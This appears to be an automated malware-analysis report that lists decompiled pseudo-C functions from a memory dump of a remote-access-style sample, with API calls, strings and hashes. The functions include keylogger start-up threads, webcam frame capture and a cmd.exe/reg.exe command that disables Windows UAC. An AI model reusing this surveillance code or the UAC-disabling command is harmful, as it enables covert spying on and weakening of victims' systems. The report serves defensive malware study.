                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165C7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165CA
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
                                    • Instruction ID: f156ac7e468d3ae20af57b6ed191c57fcc92838d981ab40ed78c867a72fe8b74
                                    • Opcode Fuzzy Hash: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
                                    • Instruction Fuzzy Hash: 6DF0C2315413187BD211AF65EC49EBF3BACDB45B92B00002AFE0992196DA38CE4596E9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E004093AD(void* __ecx) {
                                    				char _v28;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* _t7;
                                    				void* _t18;
                                    				void* _t30;
                                    				void* _t31;
                                    				void* _t32;
                                    
                                    				_t30 = __ecx;
                                    				_t36 =  *((char*)(__ecx + 0x4a));
                                    				if( *((char*)(__ecx + 0x4a)) == 0) {
                                    					_t28 = "Online Keylogger Started";
                                    					 *((char*)(__ecx + 0x4a)) = 1;
                                    					E00402084(_t18,  &_v28, "Online Keylogger Started");
                                    					_t32 = _t31 - 0x18;
                                    					E004172DA(_t32,  &_v28);
                                    					L00409634(_t18, _t30, _t36);
                                    					L00401FC7();
                                    					_t33 = _t32 - 0x18;
                                    					E00402084(_t18, _t32 - 0x18, "Online Keylogger Started");
                                    					E00402084(_t18, _t33 - 0x18, "[Info]");
                                    					L00416C80(_t18, _t28);
                                    					if( *((intOrPtr*)(_t30 + 0x49)) == 0) {
                                    						if( *_t30 == 0) {
                                    							CreateThread(0, 0, 0x408830, _t30, 0, 0);
                                    						}
                                    						CreateThread(0, 0, 0x40885a, _t30, 0, 0);
                                    					}
                                    					return CreateThread(0, 0, 0x408869, _t30, 0, 0);
                                    				}
                                    				return _t7;
                                    			}


                                    APIs
                                      • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                                      • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                                      • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00008830,?,00000000,00000000), ref: 0040942D
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000885A,?,00000000,00000000), ref: 00409439
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00008869,?,00000000,00000000), ref: 00409445
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTime$Eventwsprintf
                                    • String ID: Online Keylogger Started$[Info]
                                    • API String ID: 3546759147-3401407043
                                    • Opcode ID: a2041c6c2a2a3a2c9e5274fc0c7bccf85df625937437c628581770fe62eddfb0
                                    • Instruction ID: 55f70c683c1dd9f299002b3fa9371d2aabc85af949f207a7a15db3bb5bde523d
                                    • Opcode Fuzzy Hash: a2041c6c2a2a3a2c9e5274fc0c7bccf85df625937437c628581770fe62eddfb0
                                    • Instruction Fuzzy Hash: 5501C8A16002193AD62476764C86DBF7A6CCA81398F80057FFA85321C3D97D5C4A82FA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E0040D3F7() {
                                    				struct _PROCESS_INFORMATION _v20;
                                    				struct _STARTUPINFOA _v92;
                                    				void* __edi;
                                    				void* _t17;
                                    				long _t19;
                                    
                                    				_t19 = 0x44;
                                    				L00431F00(_t17,  &_v92, 0, _t19);
                                    				_v92.cb = _t19;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
                                    				CloseHandle(_v20);
                                    				return CloseHandle(_v20.hThread);
                                    			}


                                    APIs
                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,0040C5FB,00000000,0046C578,00000001), ref: 0040D43B
                                    • CloseHandle.KERNEL32(0040C5FB), ref: 0040D44A
                                    • CloseHandle.KERNEL32(00000027), ref: 0040D44F
                                    Strings
                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D431
                                    • C:\Windows\System32\cmd.exe, xrefs: 0040D436
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess
                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                    • API String ID: 2922976086-4183131282
                                    • Opcode ID: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
                                    • Instruction ID: 26fca9c7a1bbdca23175ff39a315bbad59b3fabc2693cff21f74514230984448
                                    • Opcode Fuzzy Hash: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
                                    • Instruction Fuzzy Hash: BDF012B290061C7FEB105AE9DC85EEFBB6CEB48795F100476F604E6011D5715D148AA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			E0040519B(void* __ecx, void* __edi) {
                                    				void* __ebx;
                                    				long _t19;
                                    				intOrPtr _t28;
                                    				void* _t29;
                                    				void* _t30;
                                    				void* _t31;
                                    				intOrPtr _t38;
                                    
                                    				_t29 = __edi;
                                    				_t30 = __ecx;
                                    				 *((intOrPtr*)(__ecx + 0x60)) = 0;
                                    				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
                                    					L3:
                                    					 *((char*)(_t30 + 0x50)) = 0;
                                    					_t38 =  *0x46bb03; // 0x0
                                    					if(_t38 != 0) {
                                    						_t32 = _t31 - 0x18;
                                    						E00402084(0, _t31 - 0x18, "Connection timeout");
                                    						E00402084(0, _t32 - 0x18, "[WARNING]");
                                    						L00416C80(0, _t29);
                                    					}
                                    					L00404E0B(_t30);
                                    					return 1;
                                    				} else {
                                    					goto L1;
                                    				}
                                    				while(1) {
                                    					L1:
                                    					_t19 = WaitForSingleObject( *(_t30 + 0x54), 0x3e8);
                                    					 *((intOrPtr*)(_t30 + 0x60)) =  *((intOrPtr*)(_t30 + 0x60)) + 1;
                                    					_t28 =  *((intOrPtr*)(_t30 + 0x60));
                                    					if(_t19 == 0) {
                                    						break;
                                    					}
                                    					if(_t28 <  *((intOrPtr*)(_t30 + 0x5c))) {
                                    						continue;
                                    					}
                                    					goto L3;
                                    				}
                                    				CloseHandle( *(_t30 + 0x54));
                                    				 *(_t30 + 0x54) = 0;
                                    				 *((char*)(_t30 + 0x50)) = 0;
                                    				SetEvent( *(_t30 + 0x58));
                                    				return 0;
                                    			}


                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405196), ref: 004051B1
                                    • CloseHandle.KERNEL32(?), ref: 00405207
                                    • SetEvent.KERNEL32(?), ref: 00405216
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandleObjectSingleWait
                                    • String ID: Connection timeout$[WARNING]
                                    • API String ID: 2055531096-1470507543
                                    • Opcode ID: 8b6936126bbdbf1623cb9cbc7df53c6cf8ce2eb3c326d1d004a7b873d990a03d
                                    • Instruction ID: 7da91c5eb563825218e032d44bddc69cdf30f244b65d1975d56df2ebc3a46463
                                    • Opcode Fuzzy Hash: 8b6936126bbdbf1623cb9cbc7df53c6cf8ce2eb3c326d1d004a7b873d990a03d
                                    • Instruction Fuzzy Hash: B801B131A41B40AFC721AF75884651BBBA4EF0530A700447EE5C3A6AA2CBB89404CF9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 96%
                                    			E0043B2BA(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
                                    				signed int _v8;
                                    				char _v16;
                                    				int _v20;
                                    				int _v24;
                                    				char* _v28;
                                    				int _v32;
                                    				char _v36;
                                    				intOrPtr _v44;
                                    				char _v48;
                                    				signed int _t59;
                                    				char* _t61;
                                    				intOrPtr _t63;
                                    				int _t64;
                                    				intOrPtr* _t65;
                                    				signed int _t68;
                                    				intOrPtr* _t71;
                                    				short* _t73;
                                    				int _t74;
                                    				int _t76;
                                    				char _t78;
                                    				short* _t83;
                                    				short _t85;
                                    				int _t91;
                                    				int _t93;
                                    				char* _t98;
                                    				int _t103;
                                    				char* _t105;
                                    				void* _t106;
                                    				intOrPtr _t108;
                                    				intOrPtr _t109;
                                    				int _t110;
                                    				short* _t113;
                                    				int _t114;
                                    				int _t116;
                                    				signed int _t117;
                                    
                                    				_t106 = __edx;
                                    				_t59 =  *0x46a00c; // 0xbd45ae92
                                    				_v8 = _t59 ^ _t117;
                                    				_t61 = _a4;
                                    				_t91 = _a12;
                                    				_t116 = 0;
                                    				_v28 = _t61;
                                    				_v20 = 0;
                                    				_t113 = _a8;
                                    				_v24 = _t113;
                                    				if(_t61 == 0 || _t91 != 0) {
                                    					if(_t113 != 0) {
                                    						L00435507(_t91,  &_v48, _t106, _a16);
                                    						_t98 = _v28;
                                    						if(_t98 == 0) {
                                    							_t63 = _v44;
                                    							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
                                    								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
                                    								if(_t64 == 0 || _v20 != _t116) {
                                    									L55:
                                    									_t65 = L0043A504();
                                    									_t114 = _t113 | 0xffffffff;
                                    									 *_t65 = 0x2a;
                                    									goto L56;
                                    								} else {
                                    									_t53 = _t64 - 1; // -1
                                    									_t114 = _t53;
                                    									L56:
                                    									if(_v36 != 0) {
                                    										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
                                    									}
                                    									goto L59;
                                    								}
                                    							}
                                    							_t68 =  *_t113 & 0x0000ffff;
                                    							if(_t68 == 0) {
                                    								L51:
                                    								_t114 = _t116;
                                    								goto L56;
                                    							}
                                    							while(_t68 <= 0xff) {
                                    								_t113 =  &(_t113[1]);
                                    								_t116 = _t116 + 1;
                                    								_t68 =  *_t113 & 0x0000ffff;
                                    								if(_t68 != 0) {
                                    									continue;
                                    								}
                                    								goto L51;
                                    							}
                                    							goto L55;
                                    						}
                                    						_t108 = _v44;
                                    						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
                                    							if( *((intOrPtr*)(_t108 + 4)) != 1) {
                                    								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
                                    								if(_t114 == 0) {
                                    									if(_v20 != _t116 || GetLastError() != 0x7a) {
                                    										L45:
                                    										_t71 = L0043A504();
                                    										_t116 = _t116 | 0xffffffff;
                                    										 *_t71 = 0x2a;
                                    										goto L51;
                                    									} else {
                                    										if(_t91 == 0) {
                                    											goto L56;
                                    										}
                                    										_t73 = _v24;
                                    										while(1) {
                                    											_t109 = _v44;
                                    											_t103 =  *(_t109 + 4);
                                    											if(_t103 > 5) {
                                    												_t103 = 5;
                                    											}
                                    											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
                                    											_t93 = _a12;
                                    											_t110 = _t74;
                                    											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
                                    												goto L55;
                                    											}
                                    											if(_t110 + _t114 > _t93) {
                                    												goto L56;
                                    											}
                                    											_t76 = _t116;
                                    											_v32 = _t76;
                                    											if(_t110 <= 0) {
                                    												L43:
                                    												_t73 = _v24 + 2;
                                    												_v24 = _t73;
                                    												if(_t114 < _t93) {
                                    													continue;
                                    												}
                                    												goto L56;
                                    											}
                                    											_t105 = _v28;
                                    											while(1) {
                                    												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
                                    												 *((char*)(_t105 + _t114)) = _t78;
                                    												if(_t78 == 0) {
                                    													goto L56;
                                    												}
                                    												_t76 = _v32 + 1;
                                    												_t114 = _t114 + 1;
                                    												_v32 = _t76;
                                    												if(_t76 < _t110) {
                                    													continue;
                                    												}
                                    												goto L43;
                                    											}
                                    											goto L56;
                                    										}
                                    										goto L55;
                                    									}
                                    								}
                                    								if(_v20 != _t116) {
                                    									goto L45;
                                    								}
                                    								_t28 = _t114 - 1; // -1
                                    								_t116 = _t28;
                                    								goto L51;
                                    							}
                                    							if(_t91 == 0) {
                                    								L21:
                                    								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
                                    								if(_t116 == 0 || _v20 != 0) {
                                    									goto L45;
                                    								} else {
                                    									if(_v28[_t116 - 1] == 0) {
                                    										_t116 = _t116 - 1;
                                    									}
                                    									goto L51;
                                    								}
                                    							}
                                    							_t83 = _t113;
                                    							_v24 = _t91;
                                    							while( *_t83 != _t116) {
                                    								_t83 =  &(_t83[1]);
                                    								_t16 =  &_v24;
                                    								 *_t16 = _v24 - 1;
                                    								if( *_t16 != 0) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							if(_v24 != _t116 &&  *_t83 == _t116) {
                                    								_t91 = (_t83 - _t113 >> 1) + 1;
                                    							}
                                    							goto L21;
                                    						}
                                    						if(_t91 == 0) {
                                    							goto L51;
                                    						}
                                    						while( *_t113 <= 0xff) {
                                    							_t98[_t116] =  *_t113;
                                    							_t85 =  *_t113;
                                    							_t113 =  &(_t113[1]);
                                    							if(_t85 == 0) {
                                    								goto L51;
                                    							}
                                    							_t116 = _t116 + 1;
                                    							if(_t116 < _t91) {
                                    								continue;
                                    							}
                                    							goto L51;
                                    						}
                                    						goto L45;
                                    					}
                                    					 *((intOrPtr*)(L0043A504())) = 0x16;
                                    					L0043695D();
                                    					goto L59;
                                    				} else {
                                    					L59:
                                    					return L0042FD1B(_v8 ^ _t117);
                                    				}
                                    			}

                                    0x0043b3c0
                                    0x0043b3c6
                                    0x0043b3c6
                                    0x00000000
                                    0x0043b3c0
                                    0x0043b3a8
                                    0x0043b36d
                                    0x0043b36f
                                    0x0043b372
                                    0x0043b377
                                    0x0043b37a
                                    0x0043b37a
                                    0x0043b37e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043b37e
                                    0x0043b383
                                    0x0043b390
                                    0x0043b390
                                    0x00000000
                                    0x0043b383
                                    0x0043b331
                                    0x00000000
                                    0x00000000
                                    0x0043b33c
                                    0x0043b347
                                    0x0043b34a
                                    0x0043b34d
                                    0x0043b353
                                    0x00000000
                                    0x00000000
                                    0x0043b359
                                    0x0043b35c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043b35e
                                    0x00000000
                                    0x0043b33c
                                    0x0043b2fb
                                    0x0043b301
                                    0x00000000
                                    0x0043b2eb
                                    0x0043b52a
                                    0x0043b53a
                                    0x0043b53a

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
                                    • Instruction ID: 0e8ff1e7bf94726707b95a2ea2eb2a738027cd1da7e878330fc773e679c7ecaa
                                    • Opcode Fuzzy Hash: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
                                    • Instruction Fuzzy Hash: 5171D231900216ABCF21CF59C884BBFBB75EF59324F14222BEA1167282D7789D41C7E9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E00404486(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char** _a8, signed int _a12) {
                                    				char _v8;
                                    				void* _v40;
                                    				char _v44;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v76;
                                    				void* __esi;
                                    				void* __ebp;
                                    				void* _t26;
                                    				char** _t28;
                                    				intOrPtr* _t30;
                                    				char* _t38;
                                    				intOrPtr _t48;
                                    				signed int _t57;
                                    				signed int _t59;
                                    				char* _t62;
                                    				void* _t66;
                                    				signed int _t67;
                                    				void* _t69;
                                    				signed int _t78;
                                    				void* _t81;
                                    				void* _t129;
                                    				signed int _t131;
                                    				signed int _t133;
                                    				signed int _t134;
                                    				signed int _t135;
                                    				signed int _t136;
                                    				signed int _t137;
                                    				signed int _t141;
                                    				void* _t144;
                                    				void* _t145;
                                    				intOrPtr* _t146;
                                    
                                    				_push(__edi);
                                    				_t125 = _a8;
                                    				_t129 = __ecx;
                                    				_t26 = L004027DA(__ecx, _a8);
                                    				_t81 = _t129;
                                    				_t152 = _t26;
                                    				if(_t26 == 0) {
                                    					_push(__ebx);
                                    					L004028B9(_t81, __edx, 0);
                                    					_t28 = E0040223F();
                                    					_t78 = _a12;
                                    					_a8 = _t28;
                                    					_t120 =  *_t28;
                                    					__eflags =  !_t120 - _t78;
                                    					if( !_t120 <= _t78) {
                                    						L004028D8(_t129);
                                    						asm("int3");
                                    						_push(_t129);
                                    						_t30 = L00401F95( &_v8);
                                    						E004042A6( &_v8,  &_v44, 4, 0xffffffff);
                                    						_t144 = (_t141 & 0xfffffff8) - 0xc;
                                    						E004020EC(_t78, _t144, _t120, __eflags, 0x46c238);
                                    						_t145 = _t144 - 0x18;
                                    						E004020EC(_t78, _t145, _t120, __eflags,  &_v60);
                                    						E00417478( &_v76, _t120);
                                    						_t146 = _t145 + 0x30;
                                    						_t131 =  *_t30 - 0x3c;
                                    						__eflags = _t131;
                                    						if(__eflags == 0) {
                                    							L00401E49( &_v52, _t120, __eflags, 0);
                                    							_t38 = E00402489();
                                    							L00401F95(L00401E49( &_v56, _t120, __eflags, 0));
                                    							_t120 = _t38;
                                    							_t133 = L0040F69B();
                                    							__eflags = _t133;
                                    							if(_t133 != 0) {
                                    								 *0x46bac4 = L0040F931(_t133, "OpenCamera");
                                    								 *0x46bac0 = L0040F931(_t133, "CloseCamera");
                                    								_t48 = L0040F931(_t133, "GetFrame");
                                    								_t120 = "FreeFrame";
                                    								 *0x46bac8 = _t48;
                                    								 *0x46babc = L0040F931(_t133, "FreeFrame");
                                    								 *0x46baaa = 1;
                                    								E004020EC(_t78, _t146 - 0x18, "FreeFrame", __eflags, 0x46c1b8);
                                    								_push(0x1b);
                                    								goto L23;
                                    							}
                                    						} else {
                                    							_t134 = _t131 - 1;
                                    							__eflags = _t134;
                                    							if(_t134 == 0) {
                                    								__eflags =  *0x46ba77;
                                    								if(__eflags != 0) {
                                    									goto L20;
                                    								}
                                    							} else {
                                    								_t135 = _t134 - 1;
                                    								__eflags = _t135;
                                    								if(_t135 == 0) {
                                    									 *0x46bac0();
                                    									 *0x46ba77 = 0;
                                    								} else {
                                    									_t136 = _t135 - 1;
                                    									__eflags = _t136;
                                    									if(_t136 == 0) {
                                    										_t57 =  *0x46bac4();
                                    										 *0x46ba77 = _t57;
                                    										__eflags = _t57;
                                    										if(__eflags == 0) {
                                    											goto L15;
                                    										} else {
                                    											L20:
                                    											_t120 = L00436769(_t52, L00401F95(L00401E49( &_v52, _t120, __eflags, 0)));
                                    											L0040471E(_a4, _t54, __eflags);
                                    										}
                                    									} else {
                                    										_t137 = _t136 - 1;
                                    										__eflags = _t137;
                                    										if(_t137 == 0) {
                                    											_t59 =  *0x46bac4();
                                    											 *0x46ba77 = _t59;
                                    											__eflags = _t59;
                                    											if(__eflags == 0) {
                                    												L15:
                                    												E004020EC(_t78, _t146 - 0x18, _t120, __eflags, 0x46c1b8);
                                    												_push(0x41);
                                    												L23:
                                    												L00404AA4(_t78, _a4, _t120, __eflags);
                                    											} else {
                                    												_t62 = L00436769(_t60, L00401F95(L00401E49( &_v52, _t120, __eflags, _t137)));
                                    												 *_t146 = 0x3e8;
                                    												Sleep(??);
                                    												_t120 = _t62;
                                    												L0040471E(_a4, _t62, __eflags);
                                    												 *0x46bac0();
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    						L00401E74( &_v52, _t120);
                                    						L00401FC7();
                                    						L00401FC7();
                                    						__eflags = 0;
                                    						return 0;
                                    					} else {
                                    						_t65 =  &(_t120[_t78]);
                                    						_a12 =  &(_t120[_t78]);
                                    						__eflags = _t78;
                                    						if(__eflags != 0) {
                                    							_push(0);
                                    							_t67 = L00402815(_t78, _t129, _t120, _t125, __eflags, _t65);
                                    							__eflags = _t67;
                                    							if(_t67 != 0) {
                                    								_push( *_a8);
                                    								_t69 = E00402229(_t129);
                                    								L0040159F(E00402229(_t129) + _t78 * 2, _t69);
                                    								_push(_t78);
                                    								L0040158B(E00402229(_t129), _t125);
                                    								L00402888(_a12);
                                    							}
                                    						}
                                    						_t66 = _t129;
                                    						goto L7;
                                    					}
                                    				} else {
                                    					_t66 = L004035BF(__ebx, _t129, __edx, _t125 - E00402229(_t81) >> 1, _t129, _t152, _t81, _t129, _t125 - E00402229(_t81) >> 1, _a12);
                                    					L7:
                                    					return _t66;
                                    				}
                                    			}

                                    [Instruction address column of the disassembly listing for E00404486, 0x0040448a to 0x0040471d; the instruction text itself is not present in this export.]

                                    APIs
                                      • Part of subcall function 004028D8: std::_Xinvalid_argument.LIBCPMT ref: 004028DD
                                    • Sleep.KERNEL32(00000000,?), ref: 004045DB
                                      • Part of subcall function 0040471E: __EH_prolog.LIBCMT ref: 00404723
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: H_prologSleepXinvalid_argumentstd::_
                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                    • API String ID: 834325642-3547787478
                                    • Opcode ID: f7ffaf143d67cfa74f05e374ba4646d16360e13fadd6f4bc1149f0de1b936085
                                    • Instruction ID: 36a5e228549547fe3264f4e150403a2e0a3e3e2746ad4685d8a770f54e79c9b4
                                    • Opcode Fuzzy Hash: f7ffaf143d67cfa74f05e374ba4646d16360e13fadd6f4bc1149f0de1b936085
                                    • Instruction Fuzzy Hash: 6651E4B1604200ABCA05BB769D0A66E3B559BC5308F00443FF905BB7E2EF7D8945879E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
                                    			E0043E550(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v36;
                                    				signed int _v40;
                                    				intOrPtr _v44;
                                    				signed int _v56;
                                    				char _v276;
                                    				short _v278;
                                    				short _v280;
                                    				char _v448;
                                    				signed int _v452;
                                    				signed int _v456;
                                    				short _v458;
                                    				intOrPtr _v460;
                                    				intOrPtr _v464;
                                    				signed int _v468;
                                    				signed int _v472;
                                    				intOrPtr _v508;
                                    				char _v536;
                                    				signed int _v540;
                                    				intOrPtr _v544;
                                    				signed int _v556;
                                    				char _v708;
                                    				signed int _v712;
                                    				signed int _v716;
                                    				short _v718;
                                    				signed int* _v720;
                                    				signed int _v724;
                                    				signed int _v728;
                                    				signed int _v732;
                                    				signed int* _v736;
                                    				signed int _v740;
                                    				signed int _v744;
                                    				signed int _v748;
                                    				signed int _v752;
                                    				char _v820;
                                    				char _v1248;
                                    				char _v1256;
                                    				intOrPtr _v1276;
                                    				signed int _v1292;
                                    				signed int _t241;
                                    				void* _t244;
                                    				signed int _t247;
                                    				signed int _t249;
                                    				signed int _t255;
                                    				signed int _t256;
                                    				signed int _t257;
                                    				signed int _t258;
                                    				signed int _t259;
                                    				signed int _t261;
                                    				signed int _t263;
                                    				void* _t265;
                                    				signed int _t266;
                                    				signed int _t267;
                                    				signed int _t268;
                                    				signed int _t270;
                                    				signed int _t280;
                                    				signed int _t281;
                                    				signed int _t282;
                                    				intOrPtr _t283;
                                    				signed int _t286;
                                    				signed int _t290;
                                    				signed int _t291;
                                    				signed int _t296;
                                    				signed int _t299;
                                    				signed int _t319;
                                    				signed int _t320;
                                    				signed int _t323;
                                    				signed int _t328;
                                    				void* _t330;
                                    				signed int _t332;
                                    				void* _t333;
                                    				intOrPtr _t334;
                                    				signed int _t339;
                                    				signed int _t340;
                                    				intOrPtr* _t343;
                                    				signed int _t357;
                                    				signed int _t359;
                                    				signed int _t361;
                                    				intOrPtr* _t362;
                                    				signed int _t364;
                                    				signed int _t370;
                                    				intOrPtr* _t374;
                                    				intOrPtr* _t377;
                                    				void* _t380;
                                    				intOrPtr* _t381;
                                    				intOrPtr* _t382;
                                    				signed int _t393;
                                    				signed int _t396;
                                    				intOrPtr* _t397;
                                    				signed int _t399;
                                    				signed int* _t403;
                                    				intOrPtr* _t410;
                                    				intOrPtr* _t411;
                                    				signed int _t421;
                                    				short _t422;
                                    				void* _t424;
                                    				signed int _t425;
                                    				signed int _t427;
                                    				intOrPtr _t428;
                                    				signed int _t431;
                                    				intOrPtr _t432;
                                    				signed int _t434;
                                    				signed int _t437;
                                    				intOrPtr _t443;
                                    				signed int _t444;
                                    				signed int _t446;
                                    				signed int _t447;
                                    				signed int _t450;
                                    				signed int _t452;
                                    				signed int _t456;
                                    				signed int* _t457;
                                    				intOrPtr* _t458;
                                    				short _t459;
                                    				void* _t461;
                                    				signed int _t463;
                                    				signed int _t465;
                                    				void* _t467;
                                    				void* _t468;
                                    				void* _t470;
                                    				signed int _t471;
                                    				void* _t472;
                                    				void* _t474;
                                    				signed int _t475;
                                    				void* _t477;
                                    				void* _t479;
                                    				intOrPtr _t491;
                                    
                                    				_t420 = __edx;
                                    				_t461 = _t467;
                                    				_t468 = _t467 - 0xc;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v12 = 1;
                                    				_t357 = E0043F98C(__ecx, 0x6a6);
                                    				_t240 = 0;
                                    				_pop(_t370);
                                    				if(_t357 == 0) {
                                    					L20:
                                    					return _t240;
                                    				} else {
                                    					_push(__edi);
                                    					_t2 = _t357 + 4; // 0x4
                                    					_t427 = _t2;
                                    					 *_t427 = 0;
                                    					 *_t357 = 1;
                                    					_t443 = _a4;
                                    					_t4 = _t443 + 0x30; // 0x43dd4f
                                    					_t241 = _t4;
                                    					_push( *_t241);
                                    					_v16 = _t241;
                                    					_push(0x457498);
                                    					_push( *0x457354);
                                    					E0043E48F(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
                                    					_t470 = _t468 + 0x18;
                                    					_v8 = 0x457354;
                                    					while(1) {
                                    						L2:
                                    						_t244 = E00448207(_t427, 0x351, ";");
                                    						_t471 = _t470 + 0xc;
                                    						if(_t244 != 0) {
                                    							break;
                                    						} else {
                                    							_t8 = _v16 + 0x10; // 0x10
                                    							_t410 = _t8;
                                    							_t339 =  *_v16;
                                    							_v16 = _t410;
                                    							_t411 =  *_t410;
                                    							goto L4;
                                    						}
                                    						while(1) {
                                    							L4:
                                    							_t420 =  *_t339;
                                    							if(_t420 !=  *_t411) {
                                    								break;
                                    							}
                                    							if(_t420 == 0) {
                                    								L8:
                                    								_t340 = 0;
                                    							} else {
                                    								_t420 =  *((intOrPtr*)(_t339 + 2));
                                    								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
                                    									break;
                                    								} else {
                                    									_t339 = _t339 + 4;
                                    									_t411 = _t411 + 4;
                                    									if(_t420 != 0) {
                                    										continue;
                                    									} else {
                                    										goto L8;
                                    									}
                                    								}
                                    							}
                                    							L10:
                                    							asm("sbb eax, eax");
                                    							_t370 = _v8 + 0xc;
                                    							_v8 = _t370;
                                    							_v12 = _v12 &  !( ~_t340);
                                    							_t343 = _v16;
                                    							_v16 = _t343;
                                    							_push( *_t343);
                                    							_push(0x457498);
                                    							_push( *_t370);
                                    							E0043E48F(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
